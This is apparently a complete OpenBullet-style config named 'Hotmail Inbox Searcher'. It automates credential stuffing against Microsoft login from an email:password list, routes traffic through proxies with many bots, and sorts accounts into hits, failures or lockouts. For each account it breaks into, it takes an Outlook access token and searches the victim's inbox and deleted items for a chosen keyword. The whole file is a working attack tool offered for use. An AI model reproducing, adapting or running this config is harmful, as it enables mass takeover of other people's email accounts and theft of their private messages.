[SETTINGS]
{
  "Name": "Hotmail Inbox Searcher",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2025-02-25T06:09:39.4186418+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "ADD KEYWORD",
      "VariableName": "KEYWOORD",
      "Id": 2108476782
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Hotmail Inbox Searcher",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://live.com/" ReadResponseSource=FALSE 
  
  HEADER "Host: live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Accept-Language: fr-FR,fr;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<COOKIES(ClientId)>" LR "" "" -> VAR "CLID" 

REQUEST GET "https://go.microsoft.com/fwlink/p/?linkid=2125442&clcid=0x40c&culture=fr-fr&country=fr" 
  
  HEADER "Host: go.microsoft.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://www.microsoft.com/" 
  HEADER "Accept-Language: fr-FR,fr;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

#1 PARSE "<SOURCE>" LR "https://login.live.com/GetCredentialType.srf?opid=" "'" -> VAR "1" 

#UID PARSE "<1>" LR "&uaid=" "" -> VAR "UID" 

#PP PARSE "<SOURCE>" LR "id=\"i0327\" value=\"" "\"" -> VAR "PP" 

#2 PARSE "<SOURCE>" LR "https://login.live.com/ppsecure/post.srf?cobrandid=" "'" -> VAR "2" 

REQUEST POST "https://login.live.com/GetCredentialType.srf?opid=<1>" 
  CONTENT "{\"username\":\"<USER>\",\"uaid\":\"<UID>\",\"isOtherIdpSupported\":true,\"checkPhones\":false,\"isRemoteNGCSupported\":true,\"isCookieBannerShown\":false,\"isFidoSupported\":true,\"forceotclogin\":false,\"otclogindisallowed\":false,\"isExternalFederationDisallowed\":false,\"isRemoteConnectSupported\":false,\"federationFlags\":3,\"isSignup\":false,\"flowToken\":\"<PP>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: login.live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "client-request-id: <UID>" 
  HEADER "Content-type: application/json; charset=UTF-8" 
  HEADER "hpgid: 33" 
  HEADER "Accept: application/json" 
  HEADER "hpgact: 0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Origin: https://login.live.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: <ADDRESS>" 
  HEADER "Accept-Language: fr-FR,fr;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "\"HasPassword\":1" 
  KEYCHAIN Success OR 
    KEY "\"HasPassword\":1" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" NotEqualTo "200" 

FUNCTION URLEncode "<USER>" -> VAR "US" 

FUNCTION URLEncode "<PASS>" -> VAR "PS" 

FUNCTION URLEncode "<PP>" -> VAR "PP2" 

REQUEST POST "https://login.live.com/ppsecure/post.srf?cobrandid=<2>" 
  CONTENT "i13=0&login=<US>&loginfmt=<US>&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<PS>&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT=<PP2>&PPSX=Passpo&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&isRecoveryAttemptPost=0&i19=7799" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://login.live.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: <ADDRESS>" 
  HEADER "Accept-Language: fr-FR,fr;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Votre compte ou mot de passe est incorrect." 
  KEYCHAIN Success AND 
    KEY "<COOKIES{*}>" Contains "__Host-MSAAUTH" 
    KEY "<RESPONSECODE>" EqualTo "200" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" NotEqualTo "200" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "action=\"https://account.live.com/recover?" 
    KEY "action=\"https://account.live.com/Abuse?" 
    KEY "action=\"https://account.live.com/ar/cancel?" 
    KEY "Vous avez essayé de vous connecter trop de fois avec un compte ou un mot de passe incorrects" 
    KEY "action=\"https://account.live.com/identity/confirm?" 

#3 PARSE "<SOURCE>" LR "],urlPost:'" "'" -> VAR "3" 

REQUEST POST "<3>" 
  CONTENT "LoginOptions=1&type=28&ctx=&hpgrequestid=&PPFT=<PP2>&i19=1510" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://login.live.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: <ADDRESS>" 
  HEADER "Accept-Language: fr-FR,fr;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" NotEqualTo "200" 

PARSE "<SOURCE>" CSS "[name=\"NAPExp\"]" "value" EncodeOutput=TRUE -> VAR "NAPExp" 

PARSE "<SOURCE>" CSS "[name=\"wbids\"]" "value" EncodeOutput=TRUE -> VAR "wbids" 

PARSE "<SOURCE>" CSS "[name=\"pprid\"]" "value" EncodeOutput=TRUE -> VAR "pprid" 

PARSE "<SOURCE>" CSS "[name=\"wbid\"]" "value" EncodeOutput=TRUE -> VAR "wbid" 

PARSE "<SOURCE>" CSS "[name=\"NAP\"]" "value" EncodeOutput=TRUE -> VAR "NAP" 

PARSE "<SOURCE>" CSS "[name=\"ANON\"]" "value" EncodeOutput=TRUE -> VAR "ANON" 

PARSE "<SOURCE>" CSS "[name=\"ANONExp\"]" "value" EncodeOutput=TRUE -> VAR "ANONExp" 

PARSE "<SOURCE>" CSS "[name=\"t\"]" "value" EncodeOutput=TRUE -> VAR "t" 

#4 PARSE "<SOURCE>" CSS "[name=\"fmHF\"]" "action" -> VAR "4" 

REQUEST POST "<4>" ReadResponseSource=FALSE 
  CONTENT "NAPExp=<NAPExp>&wbids=<wbids>&pprid=<pprid>&wbid=<wbid>&NAP=<NAP>&ANON=<ANON>&ANONExp=<ANONExp>&t=<t>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: outlook.live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://login.live.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://login.live.com/" 
  HEADER "Accept-Language: fr-FR,fr;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Retry AND 
    KEY "<RESPONSECODE>" NotEqualTo "200" 
    KEY "<ADDRESS>" DoesNotContain "/mail/" 

#MSCV PARSE "<HEADERS(MS-CV)>" LR "" "" -> VAR "MSCV" 

#CANA PARSE "<COOKIES(X-OWA-CANARY)>" LR "" "" -> VAR "CANA" 

REQUEST POST "https://outlook.live.com/owa/0/service.svc?action=GetAccessTokenforResource&UA=0&app=Mail&n=14" 
  CONTENT "" 
  CONTENTTYPE "application/json" 
  HEADER "Host: outlook.live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "x-owa-sessionid: fc9dca28-27dc-4973-81c7-a74dda9d9d82" 
  HEADER "prefer: exchange.behavior=\"IncludeThirdPartyOnlineMeetingProviders\"" 
  HEADER "x-req-source: Mail" 
  HEADER "x-owa-canary: <CANA>" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "content-type: application/json; charset=utf-8" 
  HEADER "x-owa-urlpostdata: %7B%22__type%22%3A%22TokenRequest%3A%23Exchange%22%2C%22Resource%22%3A%22https%3A%2F%2Foutlook.live.com%22%7D" 
  HEADER "action: GetAccessTokenforResource" 
  HEADER "x-owa-correlationid: 2a586c25-42b5-dba0-4a40-61a6b15038b6" 
  HEADER "ms-cv: <MSCV>" 
  HEADER "x-owa-hosted-ux: false" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://outlook.live.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://outlook.live.com/" 
  HEADER "Accept-Language: fr-FR,fr;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" NotEqualTo "200" 
    KEY "<SOURCE>" DoesNotContain "AccessToken" 

PARSE "<SOURCE>" JSON "AccessToken" -> VAR "AAT" 

REQUEST POST "https://outlook.live.com/search/api/v2/query?n=55&cv=<MSCV>" 
  CONTENT "{\"Cvid\":\"2ef9b59c-781b-a9ae-e1c4-80705240c416\",\"Scenario\":{\"Name\":\"owa.react\"},\"TimeZone\":\"Romance Standard Time\",\"TextDecorations\":\"Off\",\"EntityRequests\":[{\"EntityType\":\"Message\",\"ContentSources\":[\"Exchange\"],\"Filter\":{\"Or\":[{\"Term\":{\"DistinguishedFolderName\":\"msgfolderroot\"}},{\"Term\":{\"DistinguishedFolderName\":\"DeletedItems\"}}]},\"From\":0,\"Query\":{\"QueryString\":\"<KEYWOORD>\"},\"RefiningQueries\":null,\"Size\":25,\"Sort\":[{\"Field\":\"Score\",\"SortDirection\":\"Desc\",\"Count\":3},{\"Field\":\"Time\",\"SortDirection\":\"Desc\"}],\"EnableTopResults\":true,\"TopResultsCount\":3}],\"AnswerEntityRequests\":[{\"Query\":{\"QueryString\":\"<KEYWOORD>\"},\"EntityTypes\":[\"Event\",\"File\"],\"From\":0,\"Size\":10,\"EnableAsyncResolution\":true}],\"WholePageRankingOptions\":{\"EntityResultTypeRankingOptions\":[{\"ResultType\":\"Answer\",\"MaxEntitySetCount\":6}],\"DedupeBehaviorHint\":1},\"QueryAlterationOptions\":{\"EnableSuggestion\":true,\"EnableAlteration\":true,\"SupportedRecourseDisplayTypes\":[\"Suggestion\",\"NoResultModification\",\"NoResultFolderRefinerModification\",\"NoRequeryModification\",\"Modification\"]},\"LogicalId\":\"3f041d4d-6f76-efc4-c570-8001301f65c5\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: outlook.live.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER "x-search-griffin-version: GWSv2" 
  HEADER "x-owa-sessionid: fc9dca28-27dc-4973-81c7-a74dda9d9d82" 
  HEADER "scenariotag: 1stPg_mg" 
  HEADER "x-ms-appname: owa-reactmail" 
  HEADER "accept-language: fr-FR" 
  HEADER "authorization: Bearer <AAT>" 
  HEADER "ms-cv: <MSCV>" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "x-clientid: <CLID>" 
  HEADER "x-owa-canary: <CANA>" 
  HEADER "x-req-source: Mail" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER "content-type: application/json" 
  HEADER "client-session-id: cc308453-4f7a-f827-1a54-d0b77e155d32" 
  HEADER "x-owa-hosted-ux: false" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://outlook.live.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://outlook.live.com/" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" NotEqualTo "200" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<SOURCE>" DoesNotContain "NormalizedSubject" 

PARSE "<SOURCE>" LR "\"Id\":\"" "\"" -> VAR "IDDD" 

PARSE "<SOURCE>" JSON "Total" CreateEmpty=FALSE -> CAP "Total" 

